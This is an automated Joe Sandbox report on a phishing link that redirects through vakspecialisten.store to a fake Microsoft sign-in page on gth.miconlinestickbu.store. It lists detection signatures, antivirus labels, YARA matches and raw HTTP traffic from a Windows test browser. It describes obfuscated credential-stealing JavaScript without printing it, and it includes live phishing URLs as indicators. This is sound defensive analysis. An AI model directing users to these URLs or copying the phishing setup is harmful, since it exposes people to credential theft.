Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss

Overview

General Information

Sample URL:https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtsle
Analysis ID:1445850
Infos:

Detection

HtmlDropper, HTMLPhisher
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected Html Dropper
Yara detected HtmlPhish10
AI detected suspicious javascript
Phishing site detected (based on logo match)
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'sign-in options' or 'sign-up' link found

Classification

  • System is w10x64
  • chrome.exe (PID: 5984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2124,i,15610489227219973770,6492909471332572734,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pss" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.9.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    3.9.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      4.10.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
        4.10.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://url12.mailanyone.net/scanner?m=1s9N28-0000qa-3G&d=4%7Cmail%2F90%2F1716288000%2F1s9N28-0000qa-3G%7Cin12d%7C57e1b682%7C11949542%7C14589158%7C664C7BD820EF00EA9CDA64C5861AF4A9&o=%2Fphta%3A%2Fvtslekssiaipcr.te%2Ftoenscino-x-pk%2F6tRunvbhyfphp.x&s=qPX4ToIpiLV6GTYf9V69nGT5pssAvira URL Cloud: detection malicious, Label: phishing
          Source: https://gth.miconlinestickbu.store/boot/617b5a702a34daddd03071650f95cbe6664e0aa35f139Avira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=887db9822f538c41Avira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/jq/617b5a702a34daddd03071650f95cbe6664e0aa35f135Avira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/ASSETS/img/sig-op.svgAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/1Avira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345dbAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/js/617b5a702a34daddd03071650f95cbe6664e0aa35f13aAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/ASSETS/img/m_.svgAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/o/617b5a702a34daddd03071650f95cbe6664e0aa557579Avira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/APP-617b5a702a34daddd03071650f95cbe6664e0aa557459/617b5a702a34daddd03071650f95cbe6664e0aa55745bAvira URL Cloud: Label: phishing
          Source: https://gth.miconlinestickbu.store/x/617b5a702a34daddd03071650f95cbe6664e0aa557460Avira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760' is highly suspicious as it does not match the legitimate domain name associated with Microsoft, which is typically 'microsoft.com' or 'live.com'. The presence of a login form on a suspicious domain is a common phishing tactic. The URL and the use of social engineering techniques (mimicking a legitimate Microsoft login page) strongly indicate that this is a phishing site. DOM: 3.9.pages.csv
          Source: Yara matchFile source: 3.9.pages.csv, type: HTML
          Source: Yara matchFile source: 4.10.pages.csv, type: HTML
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760LLM: Score: 9 Reasons: The provided JavaScript code exhibits several characteristics commonly associated with malicious behavior: 1) It uses obfuscation techniques, making it difficult to understand the code's true purpose. 2) It includes functions that dynamically execute code, which can be used to inject and run arbitrary scripts. 3) It manipulates the DOM in ways that could be used to alter webpage content or steal user information. These factors collectively indicate a high risk of the code being malicious. DOM: 3.9.pages.csv
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760Matcher: Template: microsoft matched
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760#Matcher: Template: microsoft matched
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: Number of links: 0
          Source: https://gth.miconlinestickbu.store/HTTP Parser: Base64 decoded: https://gth.miconlinestickbu.store/
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: Title: 1f8baaf15ca8c77c903b374fbfc9f021664e0aa26f736 does not match URL
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: Invalid link: get a new Microsoft account
          Source: https://gth.miconlinestickbu.store/HTTP Parser: No favicon
          Source: https://gth.miconlinestickbu.store/HTTP Parser: No favicon
          Source: https://gth.miconlinestickbu.store/HTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: No favicon
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: No <meta name="author".. found
          Source: https://gth.miconlinestickbu.store/6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 2.19.244.127:443 -> 192.168.2.4:49749 version: TLS 1.2
          Source: global trafficTCP traffic: 192.168.2.4:49765 -> 1.1.1.1:53
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: vakspecialisten.store to https://gth.miconlinestickbu.store
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: vakspecialisten.store to https://gth.miconlinestickbu.store
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 2.19.244.127
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /noki/x-cp-Ruytfvb6hnx.php HTTP/1.1Host: vakspecialisten.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://url12.mailanyone.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://url12.mailanyone.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /noki/x-cp-Ruytfvb6hnx.php HTTP/1.1Host: vakspecialisten.storeConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://url12.mailanyone.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Referer: https://url12.mailanyone.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=887db9822f538c41 HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://gth.miconlinestickbu.store/?__cf_chl_rt_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/695da7821231/api.js?onload=gayxv3&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://gth.miconlinestickbu.storesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/364841505:1716387000:8tvraBwrX2ERNb1OqE2uDzGzv0lTgOfSzC-a3cgAOkk/887db9822f538c41/18215035ea345db HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=887db996294478e1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gth.miconlinestickbu.storeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gth.miconlinestickbu.store/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/887db996294478e1/1716390545214/yhIQ4Kim04yJILu HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/887db996294478e1/1716390545215/fdcd7d549205ee077dcead15de05e39851605c03eb2db3a456277fbb95e594a1/I2uC-N-gD_nQrj8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
